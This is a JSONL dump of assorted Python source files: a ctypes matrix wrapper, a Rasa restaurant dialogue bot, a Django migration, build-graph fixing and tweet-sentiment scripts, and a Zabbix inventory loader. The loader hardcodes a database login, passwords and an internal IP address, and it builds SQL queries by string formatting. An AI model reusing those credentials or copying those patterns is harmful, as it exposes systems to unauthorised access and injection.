self.cIterator.has_more:\r\n raise StopIteration\r\n result = self.cIterator.value\r\n cIterator = CSteenrod.Vector_stepIterator(self.cIterator)\r\n return result\r\n\r\n\r\nclass cMatrix:\r\n def __init__(self, p, rows, columns):\r\n self.freed = False\r\n self.p = p\r\n self.rows = rows\r\n self.columns = columns\r\n CSteenrod.initializePrime(p)\r\n self.cM = CSteenrod.Matrix_construct(p, rows, columns)\r\n \r\n def pack(self, py_M):\r\n for i in range(self.cM.contents.rows):\r\n c_packVector(self.cM.contents.matrix[i], py_M[i])\r\n\r\n def unpack(self):\r\n return [\r\n cVector(self.p, vector=self.cM.contents.matrix[i]).unpack() \r\n for i in range(self.cM.contents.rows)\r\n ]\r\n\r\n def free(self):\r\n self.freed = True\r\n CSteenrod.Matrix_free(self.cM)\r\n\r\n\r\ndef c_row_reduce(c_M):\r\n array_type = c_int * c_M.contents.columns\r\n pivots_array = array_type()\r\n CSteenrod.rowReduce(c_M, pivots_array, c_M.contents.rows)\r\n c_M.pivots = pivots_array\r\n\r\ndef vector_to_C(p, vector):\r\n c_v = cVector(p, len(vector))\r\n cVector_pack(c_v, vector)\r\n return c_v\r\n\r\ndef matrix_to_C(p, matrix):\r\n rows = len(matrix)\r\n columns = len(matrix[0])\r\n c_M = cMatrix_construct(p, rows, columns)\r\n cMatrix_pack(c_M, matrix)\r\n return c_M\r\n\r\ndef matrix_from_C(matrix):\r\n return cMatrix_unpack(matrix)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n p = 2\r\n dim = 14\r\n\r\n \r\n \r\n \r\n\r\n","sub_path":"python/CWrappers/cFpVector.py","file_name":"cFpVector.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"208854985","text":"from rasa_core.actions import Action\nfrom rasa_core.events import SlotSet\nfrom data.database import BabiDB, NOT_PREFIX\nfrom main import BABI_PATH\nfrom os.path import join\nimport logging\nfrom numpy.random import choice, seed\nfrom main import DSTC2_ONTOLOGY_FILE\nimport json\n\nseed(42)\ndb = BabiDB(babi_kb=join(BABI_PATH, 'dialog-babi-task6-dstc2-kb.txt'))\nlogger = logging.getLogger(__name__)\n\nwith open(DSTC2_ONTOLOGY_FILE, 'r') as ontology_handler:\n ontology = json.load(ontology_handler)['informable']\nfor informable in ontology:\n ontology[informable].append('dontcare')\n\n\ndef _produce_no_more_options_message(filters):\n filter_names = set(filters.keys())\n if filter_names == {'food'}:\n message = 'I am sorry but there is no other {food} restaurant that matches your request'.format(\n food=filters['food'])\n elif filter_names == {'food', 'pricerange'}:\n message = 'I am sorry but there is no other {food} restaurant in the {pricerange} price range'.format(\n food=filters['food'], pricerange=filters['pricerange'])\n elif filter_names == {'food', 'area'}:\n message = 'I am sorry but there is no other {food} restaurant in the {area} of town'.format(\n food=filters['food'], area=filters['area'])\n else:\n logger.warning('tried to produce message, but encountered unknown filter combination: {}'.\n format(filter_names))\n message = 'I am sorry but there is no other restaurant that matches your request'\n return message\n\n\ndef _produce_unsuccessful_search_message(filters):\n \"\"\"\n Builds the right 'no results found' sentence used in bAbI t6 which depends on the filters provided\n :param filters: dictionary mapping slot names to their value\n :return: message as a string\n \"\"\"\n filter_names = set(filters.keys())\n if filter_names == {'food'}:\n message = 'I\\'m sorry but there is no restaurant serving {food} food'.format(food=filters['food'])\n elif filter_names == {'food', 'area'}:\n message = 'I\\'m sorry but there is no {food} restaurant in the {area} of town'.format(food=filters['food'],\n area=filters['area'])\n elif filter_names == {'pricerange', 'food'}:\n message = 'I\\'m sorry but there is no restaurant serving {pricerange} {food} food'.format(\n pricerange=filters['pricerange'], food=filters['food'])\n elif filter_names == {'food', 'area'}:\n message = 'I\\'m sorry but there is no {food} restaurant in the {area} of town'.format(\n food=filters['food'], area=filters['area']\n )\n else:\n logger.info('unknown filter combination when producing unsuccess message: {}'.format(filter_names))\n message = 'no options available with the provided requirements'\n return message\n\n\ndef _produce_offer_restaurant_message(filters, name):\n filter_names = set(filters.keys())\n if filter_names == {'area', 'pricerange'}:\n message = '{name} is a nice place in the {area} of town and the prices are {pricerange}'.format(\n name=name,\n area=filters['area'],\n pricerange=filters['pricerange'])\n elif filter_names == {'area', 'food'}:\n message = '{name} is a nice place in the {area} of town serving tasty {food} food'.format(\n name=name, area=filters['area'], food=filters['food']\n )\n elif filter_names == {'area', 'food', 'pricerange'}:\n message = '{name} is a great restaurant serving {pricerange} {food} food in the {area} of town'.format(\n name=name, pricerange=filters['pricerange'], food=filters['food'], area=filters['area']\n )\n else:\n logger.info('unknown filter combination when producing offer restaurant message: {}'.format(filter_names))\n message = 'how about restaurant {name}?'.format(name=name)\n return message\n\n\ndef _build_request_answer(tracker, requested_entities):\n if tracker.current_slot_values()['last_offer_index'] is not None and \\\n tracker.current_slot_values()['results'] is not None:\n rest = tracker.current_slot_values()['results'].iloc[tracker.current_slot_values()['last_offer_index']]\n message = []\n if 'address' in requested_entities:\n message.append('Sure , {name} is on {address}'.format(name=rest['name'], address=rest['address']))\n if 'phone' in requested_entities:\n message.append('The phone number of {name} is {phone}'.format(name=rest['name'], phone=rest['phone']))\n if 'pricerange' in requested_entities:\n message.append('{name} is in the {pricerange} price range'.format(name=rest['name'],\n pricerange=rest['pricerange']))\n if 'food' in requested_entities:\n message.append('{name} serves {food} food'.format(name=rest['name'], food=rest['food']))\n if 'postcode' in requested_entities:\n message.append('The post code of {name} is {postcode}'.format(name=rest['name'], postcode=rest['postcode']))\n if len({'area', 'name', 'signature'} & set(requested_entities.keys())) > 0:\n logger.warning('detected request with non requestable entities: {}, input: {}'.format(requested_entities),\n tracker.latest_message.text)\n message = '. '.join(message)\n else:\n message = 'which restaurant are you talking about?'\n return message\n\n\ndef _search_and_inform(tracker, dispatcher):\n def search():\n results = db.find_restaurant(**filters)\n if len(results) == 0:\n message = _produce_unsuccessful_search_message(filters)\n else:\n message = _produce_offer_restaurant_message(filters, results.iloc[0]['name'])\n dispatcher.utter_message(message)\n return results\n\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value not in [None, 'dontcare']}\n user_intent = tracker.latest_message.intent['name']\n if user_intent == 'request':\n requested_entities = {e['entity']: e['value'] for e in tracker.latest_message.entities}\n message = _build_request_answer(tracker, requested_entities)\n dispatcher.utter_message(message)\n return []\n elif user_intent == 'deny':\n # there are only 2 deny examples in training data, so it is unlikely we ever fall here in testing\n denied_entity = tracker.latest_message.entities[0]['entity']\n denied_value = tracker.latest_message.entities[0]['value']\n logger.info('processing a deny')\n filters[denied_entity] = NOT_PREFIX + denied_value\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'inform_dontcare':\n current_slot = tracker.current_slot_values()['current_slot']\n if current_slot in filters:\n del filters[current_slot]\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'query':\n results = search()\n requested_entities = {e['entity']: e['value'] for e in tracker.latest_message.entities\n if e['entity'] not in ['food', 'area', 'pricerange']}\n if len(requested_entities) == 0:\n logger.warning('tried to perform query da, but all slots were informable')\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n else:\n message = _build_request_answer(tracker, requested_entities)\n dispatcher.utter_message(message)\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'reqalts':\n results = tracker.current_slot_values()['results']\n if results is not None:\n current_index = tracker.current_slot_values()['last_offer_index'] + 1\n if current_index < len(results):\n message = _produce_offer_restaurant_message(filters, results.iloc[current_index]['name'])\n dispatcher.utter_message(message)\n return [SlotSet(\"last_offer_index\", current_index)]\n else:\n message = _produce_no_more_options_message(filters)\n dispatcher.utter_message(message)\n return [SlotSet(\"last_offer_index\", current_index - 1)]\n else:\n logger('user uttered reqalts when no results were available')\n message = 'What type of restaurant are you looking for?'\n dispatcher.utter_message(message)\n return []\n else:\n if user_intent not in ['inform', 'include_filter']:\n logger.warning('tried to perform a restaurant search with unexpected da: {}'.format(user_intent))\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n\n\nclass ActionCantHelp(Action):\n def name(self):\n return 'canthelp'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionOffer(Action):\n def name(self):\n return 'offer'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionOfferDetailed(Action):\n def name(self):\n return 'offer_detailed'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionExplConf(Action):\n def name(self):\n return 'expl-conf'\n\n def run(self, dispatcher, tracker, domain):\n \"\"\"Which field to ask for is very random. Often the bot asks about the value that the human just provided on its\n previous utterance, but this is not guaranteed. So we'll simply pick a random filled slot and ask about it\n \"\"\"\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n selected_slot = choice(list(filters.keys()))\n value = filters[selected_slot]\n if selected_slot == 'food':\n if value == 'dontcare':\n message = choice(\n ['You are looking for a restaurant serving any kind of food right?'])\n else:\n message = 'You are looking for a {} restaurant right?'.format(value)\n elif selected_slot == 'pricerange':\n if value == 'dontcare':\n message = 'Let me confirm , You are looking for a restaurant and you dont care about the price range ' \\\n 'right?'\n else:\n message = 'Let me confirm , You are looking for a restaurant in the {} price range right?'.format(value)\n elif selected_slot == 'area':\n if value == 'dontcare':\n message = 'Ok , a restaurant in any part of town is that right?'\n else:\n message = 'Did you say you are looking for a restaurant in the {area} of town?'.format(area=value)\n dispatcher.utter_message(message)\n return []\n\n\nclass ActionSelect(Action):\n def name(self):\n return 'select'\n\n def run(self, dispatcher, tracker, domain):\n unset_slots = [var for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is None]\n if len(unset_slots) > 0:\n selected_slot = choice(unset_slots)\n value1, value2 = choice(ontology[selected_slot], size=2, replace=False)\n if selected_slot == 'food':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' else value2\n message = 'Sorry would you like {} food or you dont care'.format(other_value)\n else:\n message = 'Sorry would you like {} or {} food'.format(value1, value2)\n elif selected_slot == 'pricerange':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' else value2\n message = 'Sorry would you like something in the {} price range or you dont care'.format(\n other_value)\n else:\n message = 'Sorry would you like something in the {} price range or in the {} price range'.format(\n value1, value2)\n else: # selected_slot == 'area':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' else value2\n message = 'Sorry would you like the {} of town or you dont care'.format(other_value)\n else:\n message = 'Sorry would you like something in the {} or in the {}'.format(value1, value2)\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", selected_slot)]\n else:\n logger.warning('bot predicted ActionSelect, but there are no currently unset slots')\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionRequestAreaDetailed(Action):\n def name(self):\n return 'request_area_detailed'\n\n def run(self, dispatcher, tracker, domain):\n \"\"\"The bot affirms there are available options with the provided slots, and then requests the value of\n area. Calling this action when area is already set is a mistake that will be logged but area will be\n requested anyway\"\"\"\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'area' in filters:\n logger.warning('bot predicted request_area_detailed, but the area is already set. Uttering it anyway')\n del filters['area']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'food'}:\n if filters['food'] == 'dontcare':\n message = \"There are {} restaurants if you don't care about the food . What area do you want?\".format(\n num_results)\n else:\n message = 'There are {} restaurants serving {} food . What area do you want?'.format(num_results,\n filters['food'])\n elif other_slots == {'pricerange'}:\n if filters['pricerange'] == 'dontcare': # never observed in test data\n message = \"There are {} restaurants if you don't care about the price range . What area do you want?\".\\\n format(num_results)\n else:\n message = 'There are {} restaurants in the {} price range . What area do you want?'.format(\n num_results, filters['pricerange'])\n elif other_slots == {'food', 'pricerange'}:\n food, pricerange = filters['food'], filters['pricerange']\n if food == 'dontcare' and pricerange == 'dontcare': # never observed\n message = 'There are {} restaurants if you don\\'t care about the food in any price range . ' \\\n 'What area would you like?'.format(num_results)\n elif food == 'dontcare' and pricerange != 'dontcare': # never observed\n message = 'There are {} restaurants if you don\\'t care about the food in the {} price range . ' \\\n 'What area would you like?'.format(num_results, pricerange)\n elif food != 'dontcare' and pricerange == 'dontcare':\n message = 'There are {} restaurants serving {} in any price range . What area would you like?'.\\\n format(num_results, food)\n elif food != 'dontcare' and pricerange != 'dontcare':\n message = 'There are {} restaurants serving {} in the {} price range . What area would you like?'.\\\n format(num_results, food, pricerange)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'area')]\n\n\nclass ActionRequestFoodDetailed(Action):\n def name(self):\n return 'request_food_detailed'\n\n def run(self, dispatcher, tracker, domain):\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'food' in filters:\n logger.warning('bot predicted request_food_detailed, but the food is already set. Uttering it anyway')\n del filters['food']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'area'}:\n if filters['area'] == 'dontcare':\n message = 'There are {} restaurants in all parts of town . What type of food do you want?'.format(\n num_results)\n else:\n message = 'There are {} restaurants in the {} of town . What type of food do you want?'.format(\n num_results, filters['area'])\n elif other_slots == {'pricerange'}:\n if filters['pricerange'] == 'dontcare':\n message = 'There are restaurants if you don\\'t care about the price range . What type of food do ' \\\n 'you want?' # never observed in trn/dev/tst\n else:\n message = 'There are {} restaurants in the {} price range . What type of food do you want?'.format(\n num_results, filters['pricerange'])\n elif other_slots == {'area', 'pricerange'}:\n area, pricerange = filters['area'], filters['pricerange']\n if area == 'dontcare' and pricerange == 'dontcare':\n message = 'There are restaurants if you don\\'t care about the price range or area . What type of ' \\\n 'food do you want?' # never observed in trn/dev/tst\n elif area == 'dontcare' and pricerange != 'dontcare':\n message = 'There are restaurants in all parts of town in the {} price range . What type of food do ' \\\n 'you want?'.format(pricerange)\n elif area != 'dontcare' and pricerange == 'dontcare':\n pass # TODO\n elif area != 'dontcare' and pricerange != 'dontcare':\n message = 'There are {} restaurants in the {} price range and the {} of town . What type of food ' \\\n 'would you like?'.format(num_results, pricerange, area)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'food')]\n\n\nclass ActionRequestPricerangeDetailed(Action):\n def name(self):\n return 'request_pricerange_detailed'\n\n def run(self, dispatcher, tracker, domain):\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'pricerange' in filters:\n logger.warning('bot predicted request_pricerange_detailed, but the food is already set. Uttering it anyway')\n del filters['pricerange']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'area'}:\n if filters['area'] == 'dontcare':\n message = 'There are {} restaurants in all parts of town . What type of pricerange do you want?'.format(\n num_results)\n else:\n pass # TODO\n elif other_slots == {'food'}:\n if filters['food'] == 'dontcare':\n message = 'There are {} restaurants if you don\\'t care about the food . What price range do you want?'.\\\n format(num_results)\n else:\n message = 'There are {} restaurants serving {} food . What price range do you want?'.format(\n num_results, filters['food'])\n elif other_slots == {'area', 'food'}:\n area, food = filters['area'], filters['food']\n if area == 'dontcare' and food == 'dontcare':\n message = 'There are {} restaurants if you don\\'t care about the area or the type of food . What ' \\\n 'price range would you like?'.format(num_results)\n elif area == 'dontcare' and food != 'dontcare':\n message = 'There are {} restaurants serving {} food in any part of town . What price range would you'\n ' like?'.format(num_results, food)\n elif area != 'dontcare' and food == 'dontcare':\n message = 'There are {} restaurants in the {} of town serving any kind of food . What price range ' \\\n 'would you like?'.format(num_results, area)\n elif area != 'dontcare' and food != 'dontcare':\n message = 'There are {} restaurants serving {} in the {} of town . What price range would you like?'.\\\n format(num_results, food, area)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'pricerange')]\n","sub_path":"babi_dstc2trained/fabot/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":22308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"495368537","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('covid', '0013_chatuser_state'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chatuser',\n name='state',\n field=models.IntegerField(default=-1, null=True, blank=True),\n ),\n ]\n","sub_path":"django-api/covid/migrations/0014_auto_20200424_2012.py","file_name":"0014_auto_20200424_2012.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141836504","text":"from __future__ import print_function\nimport os, fnmatch, datetime, sys, re, math\nimport helper as helper\n\ntop = sys.argv[1]\nsch = sys.argv[2]\nst = sys.argv[3] if len(sys.argv) > 3 else \"unbuf\"\n\n\nbuildDir=top+\"/_build/\"+sch\nif st == \"buf\":\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_graph_buf.dot\")\nelif sch == \"dss\":\n\tftemp = helper.fileOpen(buildDir+\"/ds_\"+top+\"/\"+top+\".dot\")\nelse:\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\".dot\")\n\nbuf=[]\nfor line in ftemp:\n\tbuf.append(line)\nftemp.close()\n\nif st == \"buf\":\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_bbgraph_buf.dot\")\nelif sch == \"dss\":\n\tftemp = helper.fileOpen(buildDir+\"/ds_\"+top+\"/\"+top+\"_bbgraph.dot\")\nelse:\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_bbgraph.dot\")\n\nbufBB = []\nfor line in ftemp:\n\tbufBB.append(line)\nftemp.close()\n\ncheck = True\nfor line in buf:\n\tif \"bbID= 1,\" in line:\n\t\tcheck = False\n\nif check:\n\thelper.warning(\"Warning: bb offset found for benchmark \"+top+\". Fixing...\")\n\tbbMin = 0\n\tbbMax = 0\n\tfor line in buf:\n\t\tif \"bbID= \" in line:\n\t\t\tbb = helper.strFindNumber(line, \"bbID= \")\n\t\t\tbb = int(bb)\n\t\t\tif bbMax < bb and bbMax == 0: bbMin = bb\n\t\t\tif bbMax < bb: bbMax = bb\n\tprint(\"BB = 0+\"+str(bbMin) + \" - \"+ str(bbMax))\n\tbb = bbMin\n\ti = 1\n\twhile (bb <= bbMax):\n\t\tbufBB = [w.replace(\"block\"+str(bb), \"block\"+str(i)) for w in bufBB]\n\t\tbuf = [w.replace(\"bbID= \"+str(bb), \"bbID= \"+str(i)) for w in buf]\n\t\ti = i + 1\n\t\tbb = bb + 1\n\tprint(\"Now BB = 0 - \"+ str(i-1))\n\tif st == \"buf\":\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_graph_buf.dot \"+buildDir+\"/\"+top+\"_graph_buf.dot_\")\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_bbgraph_buf.dot \"+buildDir+\"/\"+top+\"_bbgraph_buf.dot_\")\n\telse:\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\".dot \"+buildDir+\"/\"+top+\".dot_\")\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_bbgraph.dot \"+buildDir+\"/\"+top+\"_bbgraph.dot_\")\n\tif st == \"buf\":\n\t\tftemp = open(buildDir+\"/\"+top+\"_graph_buf.dot\", \"w\")\n\telse:\n\t\tftemp=open(buildDir+\"/\"+top+\".dot\", \"w\")\n\tfor line in buf:\n\t\tftemp.write(line)\n\tftemp.close()\n\tif st == \"buf\":\n\t\tftemp = open(buildDir+\"/\"+top+\"_bbgraph_buf.dot\", \"w\")\n\telse:\n\t\tftemp=open(buildDir+\"/\"+top+\"_bbgraph.dot\", \"w\")\n\tfirst = True\n\tfor line in bufBB:\n\t\tif first and \"block\" in line:\n\t\t\tbb = helper.strFindNumber(line, \"block\")\n\t\t\tbb = int(bb)\n\t\t\ti = 1\n\t\t\twhile (i < bb):\n\t\t\t\tftemp.write(\"\\\"block\"+str(i)+\"\\\";\\n\")\n\t\t\t\ti = i + 1\n\t\t\tfirst = False\n\t\tftemp.write(line)\n\tftemp.close()\n\n","sub_path":"src/bb_fix.py","file_name":"bb_fix.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276348379","text":"'''\r\nIn this project, you will visualize the feelings and language used in a set of\r\nTweets. This starter code loads the appropriate libraries and the Twitter data you'll\r\nneed!\r\n'''\r\n\r\nimport json\r\nfrom textblob import TextBlob\r\n\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom wordcloud import WordCloud\r\n\r\n#Get the JSON data\r\ntweetFile = open(\"tweets_small.json\", \"r\")\r\ntweetData = json.load(tweetFile)\r\ntweetFile.close()\r\n# print(tweetData)\r\n# Continue your program below!\r\n\r\n# Get TextBlob\r\nls = [[], []]\r\nfor each in tweetData:\r\n tweet = each[\"text\"]\r\n tb = TextBlob(tweet)\r\n ls[0].append(tb.polarity)\r\n ls[1].append(tb.subjectivity)\r\n\r\n# Diagrams\r\ndef diagram(ls):\r\n f = plt.figure(1)\r\n plt.hist(ls[0], bins = 20)\r\n plt.xlabel(\"Polarity\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(\"Tweet polarity\")\r\n f.show()\r\n f.savefig(\"tweet_polarity.png\")\r\n\r\n g = plt.figure(2)\r\n plt.hist(ls[1], bins = 20)\r\n plt.xlabel(\"Subjectivity\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(\"Tweet subjectivity\")\r\n g.show()\r\n f.savefig(\"tweet_subjectivity.png\")\r\n\r\n h = plt.figure(3)\r\n plt.scatter(ls[0], ls[1])\r\n plt.xlabel(\"Polarity\")\r\n plt.ylabel(\"Subjectivity\")\r\n plt.title(\"polarity vs. subjectivity\")\r\n h.show()\r\n h.savefig(\"polarity vs. subjectivity.png\")\r\n\r\n input()\r\n\r\n# Word Cloud by Frequency\r\ndef word_cloud_freq(tweetData):\r\n all_text = \"\"\r\n word_count = {}\r\n for each in tweetData:\r\n all_text += each[\"text\"]\r\n all_text = all_text.lower()\r\n atb = TextBlob(all_text)\r\n word_list = atb.words\r\n for each in word_list:\r\n if len(each) > 3 and each.isalpha() == True and each != \"https\":\r\n if each not in word_count:\r\n word_count[each] = 1\r\n else:\r\n word_count[each] += 1\r\n wc = WordCloud(background_color=\"white\", width=900,height=500,\r\n relative_scaling=1).generate_from_frequencies(word_count)\r\n plt.imshow(wc, interpolation='bilinear')\r\n plt.show()\r\n\r\n# Combined word cloud\r\nword_cloud_freq(tweetData)\r\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135735351","text":"import numpy as np\nimport pandas as pd\nimport pandas_profiling\n\ndf = pd.read_csv('C:\\myfiles\\QA\\grepserpython\\generalscripts_python\\\\flywheel\\\\201906271006-Amazon-com-SOV-Base-2019-06-27.csv', encoding='latin')\n\nprofile = pandas_profiling.ProfileReport(df)\ndf.drop(['Country', 'Client_Name', 'Business_Unit', 'Retailer', 'Brand', 'Page', 'URL', 'Rank', 'Price',\n 'Absolute_Rank', 'UTCTime', 'Search_Dept_Sponsored', 'Search_Dept', 'Customer_ASIN', 'Price',\n 'Zone_Name', 'Zone_ID', 'Scrape_Source', 'Search_Dept_Dropdown', 'Search_Dept_Dropdown_ID',\n 'Other_Sellers_Price', 'Private_Label_Container', 'Average_Rating', 'Total_Reviews', 'Private_Label'], axis=1).head()\n\npd.value_counts(df['Keyword']).plot(kind='pie').invert_yaxis()\nprofile.to_file(output_file=\"output1.html\")","sub_path":"generalscripts_python/pandasprofilingsample.py","file_name":"pandasprofilingsample.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228312905","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport sys\nimport psycopg2\nimport time, datetime\n\nif sys.platform.startswith('win32') or sys.platform.startswith('cygwin'): # para debug quando estiver no WINDOWS\n OS = \"Windows\"\n pathModulos = r\"C:\\Users\\p788036\\Desktop\\API Zabbix\"\nelse:\n OS = \"Linux\"\n pathModulos = '/opt/scripts/work/modulos/'\n\nif pathModulos not in sys.path:\n sys.path.append(pathModulos)\n\n\nfrom functionsCaixa import *\nfrom Util import LogX3\n\n\ndef conectar_postgresql():\n try:\n DBUSERNAME = 'automacao'\n DBPASSWORD = 'Iop567#@'\n #DBUSERNAME = 'postgres'\n #DBPASSWORD = '123qwe.'\n DBNAME = 'data_criacao_equip_zabbix'\n #HOST = 'localhost'\n HOST = '10.216.76.232'\n conn = psycopg2.connect(host=HOST, database=DBNAME, user=DBUSERNAME, password=DBPASSWORD)\n cursor = conn.cursor()\n return conn, cursor\n except Exception as ex:\n print(ex)\n\n\ndef List_Insert():\n conn, cursor = conectar_postgresql()\n host = \"\"\n\n listaDic = []\n hosts = Host.get_HostHostEnable(host)\n for i in range(0,len(hosts)):\n inventario = Host.get_InventoryHost(hosts[i])\n try:\n dataPT = inventario[0]['inventory']['date_hw_install']\n except Exception as msg:\n print(msg)\n dataPT = ''\n if '' == dataPT:\n continue\n\n data1 = datetime.datetime.strptime(dataPT, \"%d/%m/%Y\")\n data = data1.strftime(\"%Y-%m-%d\")\n\n if [] != inventario[0]['inventory'] and \"\" != inventario[0]['inventory']['date_hw_install']:\n dic = {\"HostName\": hosts[i], \"Nome Visivel\": inventario[0]['name'], \"Data da criação\": data, \"Hostid\": inventario[0]['hostid']}\n\n try:\n #print(inventario[0]['hostid'], hosts[i],inventario[0]['name'], data)\n sql = \"\"\"INSERT INTO public.data_equipamentos_temp(hostid, hostname, nome_visivel, data_criacao)VALUES('{0}','{1}','{2}','{3}');\"\"\".format(\n inventario[0]['hostid'],hosts[i],inventario[0]['name'], data)\n\n cursor.execute(u\"{0}\".format(sql))\n conn.commit()\n\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n\n conn.close()\n\ndef delete_table(tabelaDelete):\n conn, cursor = conectar_postgresql()\n\n sqlD = \"\"\"begin;\n DELETE FROM public.{0};\"\"\".format(tabelaDelete)\n try:\n cur = conn.cursor()\n cur.execute(sqlD)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\ndef insert_table(tmp, prd):\n conn, cursor = conectar_postgresql()\n\n sqlD = \"\"\"begin;\n DELETE FROM public.{1};\n insert into {1} SELECT * FROM {0};\n commit;\"\"\".format(tmp, prd)\n try:\n cur = conn.cursor()\n cur.execute(sqlD)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\n\n\ndef select():\n conn, cursor = conectar_postgresql()\n\n\n try:\n cursor.execute(\"\"\"select count(*) from public.data_equipamentos_temp;\"\"\")\n quant = cursor.fetchone()\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n\n conn.commit()\n conn.close()\n\n return quant\n\ndef ultima_carga(log):\n conn, cursor = conectar_postgresql()\n\n sql = \"\"\"begin;\n DELETE FROM public.ultima_carga;\n INSERT INTO public.ultima_carga(\"log\")\n VALUES ('{0}');\n commit;\"\"\".format(log)\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n except Exception as e:\n conn.rollback()\n print(\"Dando rollback {0}\".format(str(e)))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n quant = select()[0]\n agora = datetime.datetime.now()\n inicio = agora.strftime(\"%d/%m/%Y %H:%M\")\n print(inicio)\n\n print(\"Deletando a tabela temp.....\")\n delete_table(\"data_equipamentos_temp\")\n\n print(\"Gerando Datas\"\n \"Fazendo Insert na tabela temp.....\")\n List_Insert()\n agora = datetime.datetime.now()\n fim = agora.strftime(\"%d/%m/%Y %H:%M\")\n\n if quant > 0:\n print(\"Deletando Tabela Prd Fazendo Insert na tabela principal.....\")\n insert_table(\"data_equipamentos_temp\", \"data_equipamentos\")\n\n LogX3.writelog(\"Insert Datas Realizada com Sucesso inicio {0},fim {1}\".format(inicio, fim), \"./Insert_datas.log\", \"INFO\")\n ultima_carga(\"OK\")\n else:\n LogX3.writelog(\"Insert Datas Não Realizado inicio {0},fim {1}\".format(inicio, fim), \"./Insert_datas.log\", \"INFO\")\n ultima_carga(\"FALHA\")\n","sub_path":"data_driacao_dquipamentos/dataCriação_equipamentos.py","file_name":"dataCriação_equipamentos.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 